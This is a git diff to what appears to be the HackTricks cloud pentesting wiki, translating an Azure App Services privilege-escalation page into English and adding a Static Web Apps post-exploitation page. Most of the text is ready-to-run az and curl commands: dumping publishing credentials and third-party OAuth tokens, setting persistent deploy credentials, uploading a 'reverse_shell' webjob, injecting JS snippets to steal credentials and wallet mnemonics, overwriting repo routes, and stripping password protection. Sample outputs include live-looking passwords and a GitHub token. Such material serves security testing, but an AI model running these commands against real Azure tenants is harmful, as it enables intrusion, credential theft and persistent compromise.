diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md index 5a78acc2f..7e842933c 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md @@ -4,7 +4,7 @@ ## App Services -Για περισσότερες πληροφορίες σχετικά με τις υπηρεσίες Azure App, ελέγξτε: +For more information about Azure App services check: {{#ref}} ../az-services/az-app-services.md @@ -12,14 +12,17 @@ ### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read -Αυτές οι άδειες επιτρέπουν την απόκτηση ενός **SSH shell** μέσα σε μια εφαρμογή ιστού. Επίσης επιτρέπουν την **αποσφαλμάτωση** της εφαρμογής. +These permissions allow to get a **SSH shell** inside a web app. They also allow to **debug** the application. + +- **SSH in single command**: -- **SSH σε μία εντολή**: ```bash # Direct option az webapp ssh --name --resource-group ``` -- **Δημιουργήστε σήραγγα και στη συνέχεια συνδεθείτε μέσω SSH**: + +- **Create tunnel and then connect to SSH**: + ```bash az webapp create-remote-connection --name --resource-group @@ -32,140 +35,152 @@ az webapp create-remote-connection --name --resource-group ## So from that machine ssh into that port (you might need generate a new ssh session to the jump host) ssh root@127.0.0.1 -p 39895 ``` -- **Αποσφαλμάτωση της εφαρμογής**: -1. Εγκαταστήστε την επέκταση Azure στο VScode. -2. Συνδεθείτε στην επέκταση με τον λογαριασμό Azure. -3. Καταγράψτε όλες τις υπηρεσίες App μέσα στη συνδρομή. -4. Επιλέξτε την υπηρεσία App που θέλετε να αποσφαλματώσετε, κάντε δεξί κλικ και επιλέξτε "Start Debugging". -5. Εάν η εφαρμογή δεν έχει ενεργοποιημένη την αποσφαλμάτωση, η επέκταση θα προσπαθήσει να την ενεργοποιήσει, αλλά ο λογαριασμός σας χρειάζεται την άδεια `Microsoft.Web/sites/config/write` για να το κάνει. -### Απόκτηση Διαπιστευτηρίων SCM & Ενεργοποίηση Βασικής Αυθεντικοποίησης +- **Debug the application**: + 1. Install the Azure extension in VScode. + 2. Login in the extension with the Azure account. + 3. List all the App services inside the subscription. + 4. Select the App service you want to debug, right click and select "Start Debugging". + 5. If the app doesn't have debugging enabled, the extension will try to enable it but your account needs the permission `Microsoft.Web/sites/config/write` to do so. -Για να αποκτήσετε τα διαπιστευτήρια SCM, μπορείτε να χρησιμοποιήσετε τις παρακάτω **εντολές και άδειες**: +### Obtaining SCM Credentials & Enabling Basic Authentication + +To obtain the SCM credentials, you can use the following **commands and permissions**: + +- The permission **`Microsoft.Web/sites/publishxml/action`** allows to call: -- Η άδεια **`Microsoft.Web/sites/publishxml/action`** επιτρέπει την κλήση: ```bash az webapp deployment list-publishing-profiles --name --resource-group # Example output [ { -"SQLServerDBConnectionString": "", -"controlPanelLink": "https://portal.azure.com", -"databases": null, -"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net", -"hostingProviderForumLink": "", -"msdeploySite": "happy-bay-0d8f842ef57843c89185d452c1cede2a", -"mySQLDBConnectionString": "", -"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Web Deploy", -"publishMethod": "MSDeploy", -"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443", -"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a", -"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS", -"webSystem": "WebSites" -}, -{ -"SQLServerDBConnectionString": "", -"controlPanelLink": "https://portal.azure.com", -"databases": null, -"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net", -"ftpPassiveMode": "True", -"hostingProviderForumLink": "", -"mySQLDBConnectionString": "", -"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - FTP", -"publishMethod": "FTP", -"publishUrl": "ftps://waws-prod-yt1-067.ftp.azurewebsites.windows.net/site/wwwroot", -"userName": "happy-bay-0d8f842ef57843c89185d452c1cede2a\\$happy-bay-0d8f842ef57843c89185d452c1cede2a", -"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS", -"webSystem": "WebSites" -}, -{ -"SQLServerDBConnectionString": "", -"controlPanelLink": "https://portal.azure.com", -"databases": null, -"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net", -"hostingProviderForumLink": "", -"mySQLDBConnectionString": "", -"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Zip Deploy", -"publishMethod": "ZipDeploy", -"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443", -"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a", -"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS", -"webSystem": "WebSites" -} + "SQLServerDBConnectionString": "", + "controlPanelLink": "https://portal.azure.com", + "databases": null, + "destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net", + "hostingProviderForumLink": "", + "msdeploySite": "happy-bay-0d8f842ef57843c89185d452c1cede2a", + "mySQLDBConnectionString": "", + "profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Web Deploy", + "publishMethod": "MSDeploy", + "publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443", + "userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a", + "userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS", + "webSystem": "WebSites" + }, + { + "SQLServerDBConnectionString": "", + "controlPanelLink": "https://portal.azure.com", + "databases": null, + "destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net", + "ftpPassiveMode": "True", + "hostingProviderForumLink": "", + "mySQLDBConnectionString": "", + "profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - FTP", + "publishMethod": "FTP", + "publishUrl": "ftps://waws-prod-yt1-067.ftp.azurewebsites.windows.net/site/wwwroot", + "userName": "happy-bay-0d8f842ef57843c89185d452c1cede2a\\$happy-bay-0d8f842ef57843c89185d452c1cede2a", + "userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS", + "webSystem": "WebSites" + }, + { + "SQLServerDBConnectionString": "", + "controlPanelLink": "https://portal.azure.com", + "databases": null, + "destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net", + "hostingProviderForumLink": "", + "mySQLDBConnectionString": "", + "profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Zip Deploy", + "publishMethod": "ZipDeploy", + "publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443", + "userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a", + "userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS", + "webSystem": "WebSites" + } ] ``` -Σημειώστε ότι το **όνομα χρήστη είναι πάντα το ίδιο** (εκτός από το FTP που προσθέτει το όνομα της εφαρμογής στην αρχή) αλλά ο **κωδικός πρόσβασης είναι ο ίδιος** για όλους αυτούς. -Επιπλέον, το **SCM URL είναι `.scm.azurewebsites.net`**. +Note how the **username is always the same** (except in FTP which ads the name of the app at the beginning) but the **password is the same** for all of them. + +Moreover, the **SCM URL is `.scm.azurewebsites.net`**. + +- The permission **`Microsoft.Web/sites/config/list/action`** allows to call: -- Η άδεια **`Microsoft.Web/sites/config/list/action`** επιτρέπει την κλήση: ```bash az webapp deployment list-publishing-credentials --name --resource-group # Example output { -"id": "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/carlos_rg_3170/providers/Microsoft.Web/sites/happy-bay-0d8f842ef57843c89185d452c1cede2a/publishingcredentials/$happy-bay-0d8f842ef57843c89185d452c1cede2a", -"kind": null, -"location": "Canada Central", -"name": "happy-bay-0d8f842ef57843c89185d452c1cede2a", -"publishingPassword": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS", -"publishingPasswordHash": null, -"publishingPasswordHashSalt": null, -"publishingUserName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a", -"resourceGroup": "carlos_rg_3170", -"scmUri": "https://$happy-bay-0d8f842ef57843c89185d452c1cede2a:bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS@happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net", -"type": "Microsoft.Web/sites/publishingcredentials" + "id": "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/carlos_rg_3170/providers/Microsoft.Web/sites/happy-bay-0d8f842ef57843c89185d452c1cede2a/publishingcredentials/$happy-bay-0d8f842ef57843c89185d452c1cede2a", + "kind": null, + "location": "Canada Central", + "name": "happy-bay-0d8f842ef57843c89185d452c1cede2a", + "publishingPassword": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS", + "publishingPasswordHash": null, + "publishingPasswordHashSalt": null, + "publishingUserName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a", + "resourceGroup": "carlos_rg_3170", + "scmUri": "https://$happy-bay-0d8f842ef57843c89185d452c1cede2a:bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS@happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net", + "type": "Microsoft.Web/sites/publishingcredentials" } ``` -Σημειώστε ότι τα **credentials είναι τα ίδια** με την προηγούμενη εντολή. -- Μια άλλη επιλογή θα ήταν να **ορίσετε τα δικά σας creds** και να τα χρησιμοποιήσετε: +Note how the **credentials are the same** as in the previous command. + +- Another option would be to **set you own creds** and use them: + ```bash az webapp deployment user set \ ---user-name hacktricks \ ---password 'W34kP@ssw0rd123!' + --user-name hacktricks \ + --password 'W34kP@ssw0rd123!' ``` -Τότε, μπορείτε να χρησιμοποιήσετε αυτά τα διαπιστευτήρια για να **έχετε πρόσβαση στις πλατφόρμες SCM και FTP**. Αυτός είναι επίσης ένας εξαιρετικός τρόπος για να διατηρήσετε την επιμονή. -Θυμηθείτε ότι για να αποκτήσετε πρόσβαση στην πλατφόρμα SCM από το **web πρέπει να αποκτήσετε πρόσβαση στο `/BasicAuth`**. +Then, you can use this credentials to **access the SCM and FTP platforms**. This is also a great way to maintain persistence. + +Remember that to access the SCM platform from the **web you need to access to `/BasicAuth`**. > [!WARNING] -> Σημειώστε ότι κάθε χρήστης μπορεί να ρυθμίσει τα δικά του διαπιστευτήρια καλώντας την προηγούμενη εντολή, αλλά αν ο χρήστης δεν έχει αρκετές άδειες για να αποκτήσει πρόσβαση στο SCM ή FTP, τα διαπιστευτήρια δεν θα λειτουργήσουν. +> Note that every user can configure it's own credentials calling the previous command, but if the user doesn't have enough permissions to access the SCM or FTP, the credentials won't work. + +- If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`): -- Αν δείτε ότι αυτά τα διαπιστευτήρια είναι **REDACTED**, είναι επειδή **πρέπει να ενεργοποιήσετε την επιλογή βασικής αυθεντικοποίησης SCM** και για αυτό χρειάζεστε την δεύτερη άδεια (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`): ```bash # Enable basic authentication for SCM az rest --method PUT \ ---uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \ ---body '{ -"properties": { -"allow": true -} -}' + --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \ + --body '{ + "properties": { + "allow": true + } + }' # Enable basic authentication for FTP az rest --method PUT \ ---uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \ ---body '{ -"properties": { -"allow": true -} -}' + --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \ + --body '{ + "properties": { + "allow": true + } + }' ``` -### Δημοσίευση κώδικα χρησιμοποιώντας διαπιστευτήρια SCM -Απλά έχοντας έγκυρα διαπιστευτήρια SCM είναι δυνατό να **δημοσιεύσετε κώδικα** στην υπηρεσία App. Αυτό μπορεί να γίνει χρησιμοποιώντας την παρακάτω εντολή. +### Publish code using SCM credentials -Για αυτό το παράδειγμα python μπορείτε να κατεβάσετε το repo από https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart, να κάνετε οποιεσδήποτε **αλλαγές** επιθυμείτε και στη συνέχεια να **συμπιέσετε τρέχοντας: `zip -r app.zip .`**. +Just having valid SCM credentials it's possible to **publish code** to the App service. This can be done using the following command. + +For this python example you can download the repo from https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart, do any **changes** you wish and then **zip it running: `zip -r app.zip .`**. + +Then you can **publish the code** in a web app with the following command: -Στη συνέχεια, μπορείτε να **δημοσιεύσετε τον κώδικα** σε μια διαδικτυακή εφαρμογή με την παρακάτω εντολή: ```bash curl -X POST "/api/publish?type=zip" --data-binary "@./app.zip" -u ':' -H "Content-Type: application/octet-stream" ``` + ### Webjobs: Microsoft.Web/sites/publish/Action | SCM credentials -Η αναφερόμενη άδεια Azure επιτρέπει την εκτέλεση αρκετών ενδιαφερόντων ενεργειών που μπορούν επίσης να εκτελούνται με τα διαπιστευτήρια SCM: +The mentioned Azure permission allows to perform several interesting actions that can also be performed with the SCM credentials: + +- Read **Webjobs** logs: -- Διαβάστε τα **Webjobs** logs: ```bash # Using Azure credentials az rest --method GET --url "/vfs/data/jobs//rev5/job_log.txt" --resource "https://management.azure.com/" @@ -173,108 +188,123 @@ az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.az # Using SCM username and password: curl "/vfs/data/jobs/continuous/job_name/job_log.txt" \ ---user ':' -v + --user ':' -v ``` -- Διαβάστε τον πηγαίο κώδικα **Webjobs**: + +- Read **Webjobs** source code: + ```bash # Using SCM username and password: # Find all the webjobs inside: curl "/wwwroot/App_Data/jobs/" \ ---user ':' + --user ':' # e.g. curl "https://nodewebapp-agamcvhgg3gkd3hs.scm.canadacentral-01.azurewebsites.net/wwwroot/App_Data/jobs/continuous/job_name/rev.js" \ ---user ':' + --user ':' ``` -- Δημιουργία **continuous Webjob**: + +- Create **continuous Webjob**: + ```bash # Using Azure permissions az rest \ ---method put \ ---uri "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/api/Continuouswebjobs/reverse_shell" \ ---headers '{"Content-Disposition": "attachment; filename=\"rev.js\""}' \ ---body "@/Users/username/Downloads/rev.js" \ ---resource "https://management.azure.com/" + --method put \ + --uri "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/api/Continuouswebjobs/reverse_shell" \ + --headers '{"Content-Disposition": "attachment; filename=\"rev.js\""}' \ + --body "@/Users/username/Downloads/rev.js" \ + --resource "https://management.azure.com/" # Using SCM credentials curl -X PUT \ -"/api/Continuouswebjobs/reverse_shell2" \ --H 'Content-Disposition: attachment; filename=rev.js' \ ---data-binary "@/Users/carlospolop/Downloads/rev.js" \ ---user ':' + "/api/Continuouswebjobs/reverse_shell2" \ + -H 'Content-Disposition: attachment; filename=rev.js' \ + --data-binary "@/Users/carlospolop/Downloads/rev.js" \ + --user ':' ``` + ### Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action -Αυτές οι άδειες επιτρέπουν να **ανατεθεί μια διαχειριζόμενη ταυτότητα** στην υπηρεσία App, οπότε αν μια υπηρεσία App είχε προηγουμένως παραβιαστεί, αυτό θα επιτρέψει στον επιτιθέμενο να αναθέσει νέες διαχειριζόμενες ταυτότητες στην υπηρεσία App και να **κλιμακώσει τα δικαιώματα** σε αυτές. +These permissions allow to **assign a managed identity** to the App service, so if an App service was previously compromised this will allow the attacker to assign new managed identities to the App service and **escalate privileges** to them. + ```bash az webapp identity assign --name --resource-group --identities /subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/ ``` + ### Microsoft.Web/sites/config/list/action -Αυτή η άδεια επιτρέπει την καταγραφή των **connection strings** και των **appsettings** της υπηρεσίας εφαρμογής, τα οποία μπορεί να περιέχουν ευαίσθητες πληροφορίες όπως διαπιστευτήρια βάσης δεδομένων. +This permission allows to list the **connection strings** and the **appsettings** of the App service which might contain sensitive information like database credentials. + ```bash az webapp config connection-string list --name --resource-group az webapp config appsettings list --name --resource-group ``` -### Διαβάστε τις Ρυθμισμένες Πιστοποιήσεις Τρίτων -Εκτελώντας την παρακάτω εντολή, είναι δυνατόν να **διαβάσετε τις πιστοποιήσεις τρίτων** που είναι ρυθμισμένες στον τρέχοντα λογαριασμό. Σημειώστε ότι αν για παράδειγμα κάποιες πιστοποιήσεις Github είναι ρυθμισμένες σε διαφορετικό χρήστη, δεν θα μπορείτε να αποκτήσετε πρόσβαση στο token από έναν διαφορετικό. +### Read Configured Third Party Credentials + +Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one. + ```bash az rest --method GET \ ---url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" + --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" ``` -Αυτή η εντολή επιστρέφει tokens για το Github, Bitbucket, Dropbox και OneDrive. -Εδώ έχετε μερικά παραδείγματα εντολών για να ελέγξετε τα tokens: +This command returns tokens for Github, Bitbucket, Dropbox and OneDrive. + +Here you have some command examples to check the tokens: + ```bash # GitHub – List Repositories curl -H "Authorization: token " \ --H "Accept: application/vnd.github.v3+json" \ -https://api.github.com/user/repos + -H "Accept: application/vnd.github.v3+json" \ + https://api.github.com/user/repos # Bitbucket – List Repositories curl -H "Authorization: Bearer " \ --H "Accept: application/json" \ -https://api.bitbucket.org/2.0/repositories + -H "Accept: application/json" \ + https://api.bitbucket.org/2.0/repositories # Dropbox – List Files in Root Folder curl -X POST https://api.dropboxapi.com/2/files/list_folder \ --H "Authorization: Bearer " \ --H "Content-Type: application/json" \ ---data '{"path": ""}' + -H "Authorization: Bearer " \ + -H "Content-Type: application/json" \ + --data '{"path": ""}' # OneDrive – List Files in Root Folder curl -H "Authorization: Bearer " \ --H "Accept: application/json" \ -https://graph.microsoft.com/v1.0/me/drive/root/children + -H "Accept: application/json" \ + https://graph.microsoft.com/v1.0/me/drive/root/children ``` -### Ενημέρωση Κώδικα Εφαρμογής από την πηγή -- Εάν η ρυθμισμένη πηγή είναι ένας τρίτος πάροχος όπως το Github, το BitBucket ή ένα Azure Repository, μπορείτε να **ενημερώσετε τον κώδικα** της υπηρεσίας εφαρμογής παραβιάζοντας τον πηγαίο κώδικα στο αποθετήριο. -- Εάν η εφαρμογή είναι ρυθμισμένη να χρησιμοποιεί ένα **απομακρυσμένο git repository** (με όνομα χρήστη και κωδικό πρόσβασης), είναι δυνατόν να αποκτήσετε το **URL και τα βασικά διαπιστευτήρια αυθεντικοποίησης** για να κλωνοποιήσετε και να σπρώξετε αλλαγές με: -- Χρησιμοποιώντας την άδεια **`Microsoft.Web/sites/sourcecontrols/read`**: `az webapp deployment source show --name --resource-group ` -- Χρησιμοποιώντας την άδεια **`Microsoft.Web/sites/config/list/action`**: -- `az webapp deployment list-publishing-credentials --name --resource-group ` -- `az rest --method POST --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"` -- Εάν η εφαρμογή είναι ρυθμισμένη να χρησιμοποιεί ένα **τοπικό git repository**, είναι δυνατόν να **κλωνοποιήσετε το αποθετήριο** και να **σπρώξετε αλλαγές** σε αυτό: -- Χρησιμοποιώντας την άδεια **`Microsoft.Web/sites/sourcecontrols/read`**: Μπορείτε να αποκτήσετε το URL του git repo με `az webapp deployment source show --name --resource-group `, αλλά θα είναι το ίδιο με το SCM URL της εφαρμογής με τη διαδρομή `/.git` (π.χ. `https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git`). -- Για να αποκτήσετε τα διαπιστευτήρια SCM χρειάζεστε την άδεια: -- **`Microsoft.Web/sites/publishxml/action`**: Στη συνέχεια, εκτελέστε `az webapp deployment list-publishing-profiles --resource-group -n `. -- **`Microsoft.Web/sites/config/list/action`**: Στη συνέχεια, εκτελέστε `az webapp deployment list-publishing-credentials --name --resource-group ` +### Update App Code from the source + +- If the configured source is a third-party provider like Github, BitBucket or an Azure Repository, you can **update the code** of the App service by compromising the source code in the repository. +- If the app is configured using a **remote git repository** (with username and password), it's possible to get the **URL and basic auth credentials** to clone and push changes with: + - Using the permission **`Microsoft.Web/sites/sourcecontrols/read`**: `az webapp deployment source show --name --resource-group ` + - Using the permission **`Microsoft.Web/sites/config/list/action`**: + - `az webapp deployment list-publishing-credentials --name --resource-group ` + - `az rest --method POST --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"` +- If the app is configured to use a **local git repository**, it's possible to **clone the repository** and **push changes** to it: + - Using the permission **`Microsoft.Web/sites/sourcecontrols/read`**: You can get the URL of the git repo with `az webapp deployment source show --name --resource-group `, but it's going to be the same as the the SCM URL of the app with the path `/.git` (e.g. `https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git`). + - To get the SCM credential you need the permission: + - **`Microsoft.Web/sites/publishxml/action`**: Then run `az webapp deployment list-publishing-profiles --resource-group -n `. + - **`Microsoft.Web/sites/config/list/action`**: Then run `az webapp deployment list-publishing-credentials --name --resource-group ` > [!WARNING] -> Σημειώστε ότι έχοντας την άδεια `Microsoft.Web/sites/config/list/action` και τα διαπιστευτήρια SCM είναι πάντα δυνατό να αναπτύξετε σε μια webapp (ακόμα και αν είχε ρυθμιστεί να χρησιμοποιεί έναν τρίτο πάροχο) όπως αναφέρθηκε σε προηγούμενη ενότητα. +> Note that having the permission `Microsoft.Web/sites/config/list/action` and the SCM credentials it's always possible to deploy into a webapp (even if it was configured to use a third-party provider) as mentioned in a previous section. > [!WARNING] -> Σημειώστε ότι έχοντας τις παρακάτω άδειες είναι επίσης **δυνατό να εκτελέσετε ένα αυθαίρετο κοντέινερ** ακόμα και αν η webapp είχε ρυθμιστεί διαφορετικά. +> Note that having the permissions below it's also **possible to execute an arbitrary container** even if the webapp was configured differently. ### `Microsoft.Web/sites/config/Write`, `Microsoft.Web/sites/config/Read`, `Microsoft.Web/sites/config/list/Action`, `Microsoft.Web/sites/Read` -Αυτό είναι το σύνολο αδειών που επιτρέπει να **τροποποιήσετε το κοντέινερ που χρησιμοποιείται** από μια webapp. Ένας επιτιθέμενος θα μπορούσε να το εκμεταλλευτεί για να κάνει μια webapp να εκτελεί ένα κακόβουλο κοντέινερ. +This is the set of permissions that allows to **modify the container used** by a webapp. An attacker could abuse it to make a webapp execute a malicious container. + ```bash az webapp config container set \ ---name \ ---resource-group \ ---docker-custom-image-name mcr.microsoft.com/appsvc/staticsite:latest + --name \ + --resource-group \ + --docker-custom-image-name mcr.microsoft.com/appsvc/staticsite:latest ``` + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md new file mode 100644 index 000000000..d35927766 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md @@ -0,0 +1,296 @@ +# Az - Static Web Apps Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Azure Static Web Apps + +For more information about this service check: + +{{#ref}} +../az-services/az-static-web-apps.md +{{#endref}} + +### Microsoft.Web/staticSites/snippets/write + +It's possible to make a static web page load arbitary HTML code by creating a snippet. This could allow an attacker to inject JS code inside the web app and steal sensitive information such as credentials or mnemonic keys (in web3 wallets). + +The fllowing command create an snippet that will always be loaded by the web app:: + +```bash +az rest \ + --method PUT \ + --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//snippets/?api-version=2022-03-01" \ + --headers "Content-Type=application/json" \ + --body '{ + "properties": { + "name": "supersnippet", + "location": "Body", + "applicableEnvironmentsMode": "AllEnvironments", + "content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K", + "environments": [], + "insertBottom": false + } + }' +``` + +### Read Configured Third Party Credentials + +As explained in the App Service section: + +{{#ref}} +../az-privilege-escalation/az-app-services-privesc.md +{{#endref}} + +Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one. + +```bash +az rest --method GET \ + --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" +``` + +This command returns tokens for Github, Bitbucket, Dropbox and OneDrive. + +Here you have some command examples to check the tokens: + +```bash +# GitHub – List Repositories +curl -H "Authorization: token " \ + -H "Accept: application/vnd.github.v3+json" \ + https://api.github.com/user/repos + +# Bitbucket – List Repositories +curl -H "Authorization: Bearer " \ + -H "Accept: application/json" \ + https://api.bitbucket.org/2.0/repositories + +# Dropbox – List Files in Root Folder +curl -X POST https://api.dropboxapi.com/2/files/list_folder \ + -H "Authorization: Bearer " \ + -H "Content-Type: application/json" \ + --data '{"path": ""}' + +# OneDrive – List Files in Root Folder +curl -H "Authorization: Bearer " \ + -H "Accept: application/json" \ + https://graph.microsoft.com/v1.0/me/drive/root/children +``` + +### Overwrite file - Overwrite routes, HTML, JS... + +It's possible to **overwrite a file inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message. + +This can be abused by attackers to basically **change the content of the web app** to serve malicious content (steal credentials, mnemonic keys...) or just to **re-route certain paths** to their own servers by overwriting the `staticwebapp.config.json` file. + +> [!WARNING] +> Note that if an attacker manages to compromise the Github repo in any way, they can also overwrite the file directly from Github. + +```bash +curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \ +-H "Content-Type: application/json" \ +-d '{ + "commit": { + "message": "Update static web app route configuration", + "branchName": "main", + "committer": { + "name": "Azure App Service", + "email": "donotreply@microsoft.com" + }, + "contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==", + "filePath": "staticwebapp.config.json", + "message": "Update static web app route configuration", + "repoName": "carlospolop/my-first-static-web-app", + "sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4" + }, + "gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL" +}' +``` + + +### Microsoft.Web/staticSites/config/write + +With this permission, it's possible to **modify the password** protecting a static web app or even unprotect every environment by sending a request such as the following: + +```bash +# Change password +az rest --method put \ +--url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ +--headers 'Content-Type=application/json' \ +--body '{ + "name": "basicAuth", + "type": "Microsoft.Web/staticSites/basicAuth", + "properties": { + "password": "SuperPassword123.", + "secretUrl": "", + "applicableEnvironmentsMode": "AllEnvironments" + } +}' + +# Remove the need of a password +az rest --method put \ +--url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ +--headers 'Content-Type=application/json' \ +--body '{ + "name": "basicAuth", + "type": "Microsoft.Web/staticSites/basicAuth", + "properties": { + "secretUrl": "", + "applicableEnvironmentsMode": "SpecifiedEnvironments", + "secretState": "None" + } +}' +``` + +### Microsoft.Web/staticSites/listSecrets/action + +This permission allows to get the **API key deployment token** for the static app: + +```bash +az rest --method POST \ +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//listSecrets?api-version=2023-01-01" +``` + +Then, in order to **update an app using the token** you could run the following command. Note that this command was extracted checking **how to Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) works**, as it's the one Azure set by default ot use. So the image and paarements could change in the future. + +1. Download the repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (or any other repo 